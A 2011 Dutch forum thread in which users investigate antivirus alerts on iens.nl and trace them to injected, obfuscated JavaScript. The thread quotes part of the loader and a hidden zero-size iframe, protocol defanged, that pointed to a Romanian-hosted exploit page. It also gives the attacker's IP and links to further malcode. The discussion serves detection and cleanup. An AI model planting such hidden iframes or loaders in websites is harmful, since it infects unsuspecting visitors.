Trojan op www.iens.nl of false positive?

Pagina: 1
Acties:

Acties:
  • 0 Henk 'm!

  • Dr. Cheeks
  • Registratie: Oktober 2000
  • Laatst online: 29-08 21:27
Sinds vanochtend geeft Kaspersky Anti-Virus (zakelijke variant) een waarschuwing bij het bezoeken van
code:
1
www.iens.nl
. Er zou een iframe zijn met een trojan ('HEUR:Trojan.Script.Iframer').

Is dit een false-positive, of zien jullie ook gekke dingen op iens? Iens is toch een van de grotere Nederlandse sites... zou wat zijn als die gehackt is!

(Mijn gebruikers schreeuwen dat ze bij iens willen, maar ik houdt het nog even op slot totdat er meer duidelijk is... >:) )

[ Voor 0% gewijzigd door iisschots op 13-07-2011 11:38 . Reden: Mogelijk gevaarlijke sites zetten we altijd tussen code tags ]


Acties:
  • 0 Henk 'm!

  • Rolfie
  • Registratie: Oktober 2003
  • Laatst online: 17:13
Ik krijg ook een trojan melding.

Is dus iets niet goed op de site.

Acties:
  • 0 Henk 'm!

  • Burner NL
  • Registratie: November 2002
  • Laatst online: 26-09 00:48
Met Avast Home krijg ik geen melding over een mogelijke trojan.

Acties:
  • 0 Henk 'm!

Verwijderd

NOD32 klaagt ook. Heb wat javascript uit de quarantaine gehaald en dat ziet er zo uit:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
q = "v";
ww = Number.MAX_VALUE;

el = document.getElementsByTagName("di" + q)[0]; // Haalt de eerste div op, hierin staat een enorme cijferreeks

try {

    if (isFinite(ww) && !isFinite(ww * 1.5))
        throw 'xtNode';

} catch (qweqwe) {

    with ({
        a : 'createTe'
    }) {

        k = document[a + qweqwe]("eval"); // oftewel document[createTextNode]("eval")

    }

}


Commentaar is van mij. Code gaat nog een stukje verder zo. Op z'n minst erg dubieus.

Acties:
  • 0 Henk 'm!

  • jopitan
  • Registratie: Juni 2007
  • Laatst online: 06-08 11:38

jopitan

It's just a fact

Krijg geen melding met Norman Security Suite, ook geen rare code op de website te zien ofzo.

CPU: i7-5820K @ 4.4GHz | CCooler: NZXT Kraken X61 | MEM: Kingston 16GB @ 2666MHz | GPU: RX470 | PSU: OCZ 1250W | SSD: Samsung Pro 500GB


Acties:
  • 0 Henk 'm!

  • hhoekstra
  • Registratie: Maart 2008
  • Laatst online: 15:46
Van nod32 krijg ik door dat de volgende website geblokkeerd is:
** laat maar is oudere melding :P

Edit: deze melding krijg ik

Afbeeldingslocatie: http://screenshotuploader.com/i/TI8LwCBRlWb.png

[ Voor 104% gewijzigd door hhoekstra op 13-07-2011 20:49 ]


Acties:
  • 0 Henk 'm!

  • InFamous
  • Registratie: Januari 2010
  • Laatst online: 21:58

InFamous

excommunicado

Hier ook een melding van Mircosoft Security Essentials, 1 mogelijke dreiging gevonden. Vervolgens probeert de site bij mij in iedergeval een soort van pdf bestand te openen acrobat start op maar kan niks ontvangen omdat dit geblokkeerd word door MSE. Misschien tijd om de berheerders van de website op de hoogte te stellen.

De website probeert inderdaad een pdf bestand te openen wat besmet is. file C:\users\xxxx\appdata\local\microsoft\windows\temporary internet files\content.ie5\wryxh43r\cda0[1].pdf
De trojaan staat bekend onder de naar Win32/Pfdjsc.RF

[ Voor 27% gewijzigd door InFamous op 13-07-2011 20:48 ]

Formerly known as Ragdoll


Acties:
  • 0 Henk 'm!

  • jopitan
  • Registratie: Juni 2007
  • Laatst online: 06-08 11:38

jopitan

It's just a fact

Ah vandaar, ik heb adblocker :)

CPU: i7-5820K @ 4.4GHz | CCooler: NZXT Kraken X61 | MEM: Kingston 16GB @ 2666MHz | GPU: RX470 | PSU: OCZ 1250W | SSD: Samsung Pro 500GB


Acties:
  • 0 Henk 'm!

Verwijderd

Krijgen jullie meldingen op specifieke bestanden? Graag een (enigszins defecte) link indien mogelijk :)

Acties:
  • 0 Henk 'm!

  • EDIT
  • Registratie: Januari 2007
  • Laatst online: 23:39
Jup, op een .be domein:

Virusmelding Iens

Acties:
  • 0 Henk 'm!

Verwijderd

Ik heb de unpacker even gedraaid zonder daadwerkelijk iets uit te voeren. In de uitgepakte JS wordt verwezen naar onder andere dit ip-adres 91.208.142.55, java applets op ./games/worms.jar maar zonder direct zichtbaar domein en pogingen om PDF's te openen.

Zeker malware dus.

Acties:
  • 0 Henk 'm!

  • HenkEisDS
  • Registratie: Maart 2004
  • Laatst online: 16:35
Direct contact opnemen met iens en een mailtje sturen naar abuse@iens.nl en info@iens.nl

Acties:
  • 0 Henk 'm!

  • Sharky_NL
  • Registratie: Juni 2007
  • Laatst online: 18-09 14:38
En als je het ip adres opzoekt komt je uit in Roemenie. :(

Acties:
  • 0 Henk 'm!

  • jopitan
  • Registratie: Juni 2007
  • Laatst online: 06-08 11:38

jopitan

It's just a fact

Ik weet niet hoe het met jullie zit maar ik kan helemaal niks terug vinden in de broncode van het IP 91.208.*.* of het domein naam ervan. Ik zie wel een eval(function(p,a,c,k,e,r)) erin staan maar dat lijkt me sterk dat dat hem is.

CPU: i7-5820K @ 4.4GHz | CCooler: NZXT Kraken X61 | MEM: Kingston 16GB @ 2666MHz | GPU: RX470 | PSU: OCZ 1250W | SSD: Samsung Pro 500GB


Acties:
  • 0 Henk 'm!

  • JJ Le Funk
  • Registratie: Januari 2004
  • Niet online

JJ Le Funk

:twk

kaspersky internet security 2012 geeft dezelfde waarschuwing als bij TS (zakelijke editie).

d:)b


Acties:
  • 0 Henk 'm!

  • wlchris
  • Registratie: Juni 2007
  • Laatst online: 16:27
jopitan schreef op woensdag 13 juli 2011 @ 21:12:
Ik weet niet hoe het met jullie zit maar ik kan helemaal niks terug vinden in de broncode van het IP 91.208.*.* of het domein naam ervan. Ik zie wel een eval(function(p,a,c,k,e,r)) erin staan maar dat lijkt me sterk dat dat hem is.
Dat is hem, hier de raw output.

http://jsunpack.jeek.org/...6eb677dba1373c579ac345483

Acties:
  • 0 Henk 'm!

  • JJ Le Funk
  • Registratie: Januari 2004
  • Niet online

JJ Le Funk

:twk

op dat IP lijkt een reversed proxy te draaien

d:)b


Acties:
  • 0 Henk 'm!

Verwijderd

Correct, de hostname staat er ook achterstevoren in. Een grep had hem al gevonden. Nasty little bugger...

Acties:
  • 0 Henk 'm!

Verwijderd

Die link naar jsunpack geeft een ander bestand en foutmelding dan ik krijg. Deze inderdaad Iframe.B.Gen virus. Op iens.nl krijg ik JS/Kryptik.BB trojan.

Vermoedelijk door het volgen van die link is nu mijn Firefox sessionstore.js besmet en krijg ik continue meldingen van NOD32. Klikken op eigen risico dus ;)

Acties:
  • 0 Henk 'm!

Verwijderd

Wil iedereen s.v.p. zijn/haar cache leegmaken en de browser herstarten? De code staat inmiddels niet meer op de homepage, dus als het goed is komen er geen nieuwe meldingen meer.

[ Voor 7% gewijzigd door Verwijderd op 13-07-2011 21:38 ]


Acties:
  • 0 Henk 'm!

  • Timv37
  • Registratie: Augustus 2008
  • Laatst online: 15:18
NOD32 nu schoon hier :)

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 13 juli 2011 @ 21:36:
Wil iedereen s.v.p. zijn/haar cache leegmaken en de browser herstarten? De code staat inmiddels niet meer op de homepage, dus als het goed is komen er geen nieuwe meldingen meer.
Niet vergeten het daadwerkelijke lek te fixen. ;)

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 13 juli 2011 @ 21:39:

Niet vergeten het daadwerkelijke lek te fixen. ;)
Dat laat ik over aan de developers van IENS, ik werk slechts voor hun hosting provider ;)

Acties:
  • 0 Henk 'm!

  • Thralas
  • Registratie: December 2002
  • Laatst online: 00:15
Ik hoop dat die scanners van jullie context-aware zijn. Zoniet, excuses.

De packed + obfuscated JS-code dropt een iframe:

code:
1
<iframe src="h_niet_doen_p://vawboman71.co.be/forum.php?tp=bc4453c0040c9021" width="0" height="0" style="visibility:hidden;position:absolute !important;left:-5000px !important;top:0px;"></iframe>


code:
1
2
3
4
5
6
7
8
Name:   vawboman71.co.be
Address: 91.208.142.55

inetnum:        91.208.142.0 - 91.208.142.255
netname:        SC-GAZDUIRE-WEB-SRL
descr:          Gazduire Web S.R.L.
org:            ORG-GWS1-RIPE
country:        RO


De pagina in 't iframe bevat weer obfuscated JS, welke deze obfuscated HTML/JS dropped: http://pastie.org/private/xkmrf6awcmzhdgyknjeig

Veel version detection van Acrobat/Java plugins & whatnot, maar ik zie alleen zo snel geen payload.. kijk ik eroverheen?

edit:
Misschien is dit gewoon een obfuscated tracker oid, en is de payload al weg?

[ Voor 5% gewijzigd door Thralas op 13-07-2011 21:52 ]


Acties:
  • 0 Henk 'm!

Verwijderd

Yup. ;)
Genoeg malcode te vinden. Tread with caution.

Acties:
  • 0 Henk 'm!

Verwijderd

Ik heb inmiddels een en ander kunnen traceren aan de hand van het tijdstip waarop er aanpassingen zijn geweest in combinatie met de logbestanden. Het lijkt er sterk op dat een paar Russische kameraden een aanval hebben uitgevoerd waarbij het kennelijk uiteindelijk is gelukt iets te uploaden en uit te voeren. Ik heb de complete log opgeslagen en opgestuurd naar IENS voor nader onderzoek.

Namens Proserve in elk geval bedankt voor het melden en helpen oplossen :)
Pagina: 1